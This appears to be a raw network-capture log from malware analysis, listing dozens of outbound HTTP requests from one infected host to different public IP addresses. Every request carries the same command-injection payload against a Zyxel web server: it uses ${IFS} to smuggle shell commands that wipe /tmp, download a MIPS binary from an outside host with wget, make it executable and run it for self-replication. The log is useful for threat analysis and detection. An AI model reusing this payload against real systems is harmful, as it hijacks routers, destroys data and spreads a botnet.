                                        Mar 31, 2024 09:22:14.534388065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7282192.168.2.2340754192.43.106.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534426928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7283192.168.2.2356064115.171.249.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534463882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7284192.168.2.2343940139.198.140.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534519911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7285192.168.2.2344124218.170.126.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534559011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7286192.168.2.2342188212.193.48.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534594059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7287192.168.2.234498062.186.46.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534637928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7288192.168.2.2336200210.230.210.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534683943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7289192.168.2.2342300145.172.28.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534730911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7290192.168.2.2345214191.52.164.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534769058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7291192.168.2.2357762102.243.8.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534806013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7292192.168.2.2336058130.19.10.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534848928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7293192.168.2.235749498.249.166.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534892082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7294192.168.2.2346856107.172.46.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534945011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7295192.168.2.2347910165.113.149.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.534981012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7296192.168.2.2355236118.197.179.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535015106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7297192.168.2.2348296220.124.231.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535059929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7298192.168.2.235725646.38.60.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535103083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7299192.168.2.235929859.136.117.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535154104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7300192.168.2.234374053.15.82.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535173893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7301192.168.2.235004243.89.68.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535216093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7302192.168.2.2356140149.156.117.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535264015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7303192.168.2.2344416202.91.98.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535307884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7304192.168.2.2334854222.172.93.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535346031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7305192.168.2.2339692144.253.24.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535392046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7306192.168.2.23379925.157.225.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535423994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7307192.168.2.233349657.25.16.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535470963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7308192.168.2.234332051.175.221.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535506010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7309192.168.2.234580079.239.155.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535552025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7310192.168.2.2344544151.17.126.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535592079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7311192.168.2.235563289.165.95.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535645962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7312192.168.2.2341574179.37.233.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535692930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7313192.168.2.2341350168.31.96.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535726070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7314192.168.2.235079812.254.14.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535773039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7315192.168.2.2332776172.72.239.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535808086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7316192.168.2.2355022158.83.88.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535861015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7317192.168.2.2348742160.100.8.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535888910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7318192.168.2.233444099.200.74.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535938025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7319192.168.2.233712883.201.198.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.535974979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7320192.168.2.2343684179.143.99.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536024094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7321192.168.2.23570805.114.174.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536067009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7322192.168.2.2337932154.54.184.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536109924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7323192.168.2.234368040.64.103.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536147118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7324192.168.2.233473440.93.139.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536201954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7325192.168.2.2345478204.224.99.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536242008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7326192.168.2.2360302163.226.57.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536267042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7327192.168.2.2348122204.69.35.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536302090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7328192.168.2.2351124131.96.142.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536339998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7329192.168.2.236020682.227.51.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536385059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7330192.168.2.234079840.15.184.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536422968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7331192.168.2.236038497.224.19.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536442995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7332192.168.2.2349412199.7.42.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536499023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7333192.168.2.2340850129.116.183.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536534071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7334192.168.2.233981862.185.68.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536578894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7335192.168.2.233603475.177.72.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536611080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7336192.168.2.2344298161.83.3.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536665916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7337192.168.2.2349506178.168.126.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536695004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7338192.168.2.2358796199.63.204.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536725998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7339192.168.2.2348240167.71.238.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536781073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7340192.168.2.2347414189.159.191.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536834002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7341192.168.2.2358108176.149.171.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536864996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7342192.168.2.235454276.154.213.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536936998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7343192.168.2.233427243.106.236.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.536977053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7344192.168.2.233346682.169.36.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537007093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7345192.168.2.2348320218.96.213.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537059069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7346192.168.2.2333652207.2.206.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537092924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7347192.168.2.234799297.248.229.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537137032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7348192.168.2.2351686194.41.218.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:14.537168026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7349192.168.2.2346630119.200.162.142443
                                        TimestampBytes transferredDirectionData
